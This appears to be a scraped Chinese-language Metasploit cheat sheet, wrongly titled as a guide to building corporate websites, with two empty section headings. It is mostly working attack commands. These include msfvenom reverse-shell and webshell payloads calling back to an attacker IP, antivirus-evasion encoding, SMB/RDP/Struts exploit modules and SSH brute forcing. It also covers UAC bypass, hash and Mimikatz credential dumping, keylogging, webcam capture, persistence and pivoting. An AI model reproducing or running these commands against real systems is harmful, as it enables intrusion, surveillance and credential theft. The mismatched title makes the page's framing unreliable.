企业官网建设流程全解析

Metasploit 基础应用

一、MSF 核心架构（6大组件）

二、基础操作命令

1. 启动与退出

msfconsole# 启动msfconsole-q# 静默启动（去Banner）msfconsole-x"use ..."# 启动后直接执行命令exit/ quit# 退出

2. 模块管理

search 关键词# 搜索模块（如 search ms08_067）use 完整模块路径# 加载模块back# 返回上一级info# 查看模块详细信息show options# 查看当前配置参数show targets# 查看目标系统类型show payloads# 查看可用Payload

3. 参数设置

set参数名 值# 设置参数（如 set RHOSTS 192.168.1.1）setg 参数名 值# 全局设置（所有模块生效）unset参数名# 取消设置unsetg 参数名# 取消全局设置

4. 执行攻击

run# 执行（Auxiliary/Post模块）exploit# 执行（Exploit模块）exploit-j# 后台执行exploit-z# 执行后不立即进入会话check# 检测目标是否存在漏洞

三、常用模块分类及应用

1. 信息收集（Auxiliary）

# 端口扫描use auxiliary/scanner/portscan/tcpsetRHOSTS192.168.1.0/24setPORTS1-1000 run# SMB共享扫描use auxiliary/scanner/smb/smb_share# SSH暴力破解use auxiliary/scanner/ssh/ssh_loginsetUSER_FILE /usr/share/wordlists/users.txtsetPASS_FILE /usr/share/wordlists/passwords.txt

2. 漏洞利用（Exploit）

# Windows SMBuse exploit/windows/smb/ms08_067_netapi# Windows RDPuse exploit/windows/rdp/cve_2019_0708_bluekeep# Linux Sambause exploit/linux/samba/is_known_pipename# Web 应用use exploit/multi/http/struts2_rest_xstream use exploit/multi/http/tomcat_mgr_deploy

3. Payload 生成（msfvenom）

# 列出所有Payloadmsfvenom-lpayloads# 生成Windows反弹Shell木马msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.1.129LPORT=4444-fexe-opayload.exe# 生成Linux反弹Shellmsfvenom-plinux/x86/meterpreter/reverse_tcpLHOST=192.168.1.129LPORT=4444-felf-opayload.elf# 生成PHP WebShellmsfvenom-pphp/meterpreter_reverse_tcpLHOST=192.168.1.129LPORT=4444-fraw-opayload.php# 编码免杀（Shikata Ga Nai）msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.1.129LPORT=4444-ex86/shikata_ga_nai-i5-fexe-opayload_encoded.exe

4. 监听配置（Handler）

use exploit/multi/handlersetPAYLOAD windows/meterpreter/reverse_tcpsetLHOST192.168.1.129setLPORT4444run

四、Meterpreter 后渗透操作

1. 系统信息

sysinfo# 系统信息getuid# 当前用户getpid# 当前进程PIDgetsystem# 提权

2. 文件操作

pwd/cd/ls# 目录操作upload /root/test.txt C:\\test.txt download C:\\test.txt /root/cat文件名# 查看文件内容edit 文件名# 编辑文件

3. 网络操作

ipconfig /ifconfig# 查看网络配置arp# 查看ARP表route# 路由表netstat# 端口状态

4. 进程管理

ps# 查看进程migrate PID号# 迁移进程（稳定会话）killPID号# 终止进程

5. 权限提升

getsystem# 自动提权（Windows）bypassuac# 绕过UACrun post/windows/escalate/bypassuac

6. 信息窃取

hashdump# 提取密码Hashdump_credentials# 抓取密码明文（kiwi模块）load kiwi# 加载Mimikatzcred_all# 提取所有凭证

7. 屏幕/键盘

screenshot# 截图record_mic# 录音webcam_snap# 摄像头拍照keyscan_start# 键盘记录开始keyscan_dump# 导出键盘记录keyscan_stop# 停止记录

8. 持久化

run persistence-U-i5-p4444-r192.168.1.129# -U 开机自启, -i 5 每隔5秒重连, -p 端口, -r 攻击机IP

9. 跳板（内网渗透）

run autoroute-s192.168.1.0/24# 添加路由run autoroute-p# 查看路由background# 将会话放入后台sessions-i1# 切回会话

10. 端口转发

portfwdadd-L0.0.0.0-l3389-p3389-r192.168.1.138# 将远程3389转发到本机3389

五、常用场景组合命令

场景1：完全控制一台 Windows

msfconsole use exploit/windows/smb/ms08_067_netapisetRHOSTS192.168.1.138setLHOST192.168.1.129setLPORT4444run# 会话建立后sysinfo getsystem hashdump screenshot shell

场景2：内网渗透（跳板）

# 先获取边界服务器会话sessions-lsessions-i1# 添加路由进入内网run autoroute-s192.168.10.0/24# 后台运行background# 扫描内网445端口use auxiliary/scanner/portscan/tcpsetRHOSTS192.168.10.1-254setPORTS445run

六、常用辅助工具组合

七、数据库管理

db_create# 创建数据库db_connect# 连接数据库db_nmap192.168.1.0/24# 扫描结果直接入库hosts# 查看主机列表services# 查看服务列表vulns# 查看漏洞列表

八、常用组合快捷键

以上就是 MSF 基础应用的全景图。掌握了这些，你就可以完成绝大多数渗透测试任务了！